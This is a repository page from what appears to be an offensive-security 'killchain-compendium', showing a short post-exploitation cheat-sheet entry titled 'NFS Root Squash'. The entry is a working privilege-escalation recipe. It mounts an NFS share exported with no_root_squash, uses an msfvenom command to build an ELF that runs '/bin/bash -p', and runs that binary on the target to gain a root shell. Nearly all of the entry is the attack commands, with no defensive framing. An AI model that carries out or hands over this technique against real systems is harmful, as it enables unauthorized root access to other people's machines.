This website requires JavaScript.
Explore
Help
Sign In
whx
/
killchain-compendium
Watch
1
Star
0
Fork
You've already forked killchain-compendium
0
Code
Issues
Pull Requests
Projects
Releases
Wiki
Activity
11abafb8e6
killchain-compendium
/
Post Exploitation
/
NFS Root Squash.md
213 B
Raw
Blame
History
NFS NO ROOT SQUASH
Mount nfs locally and gain root
Craft a Shell
msfvenom -p linux/x86/exec
CMD
=
"/bin/bash -p"
-f elf -o /tmp/nfs/shell.elf
Copy to target and use it
./shell.elf -p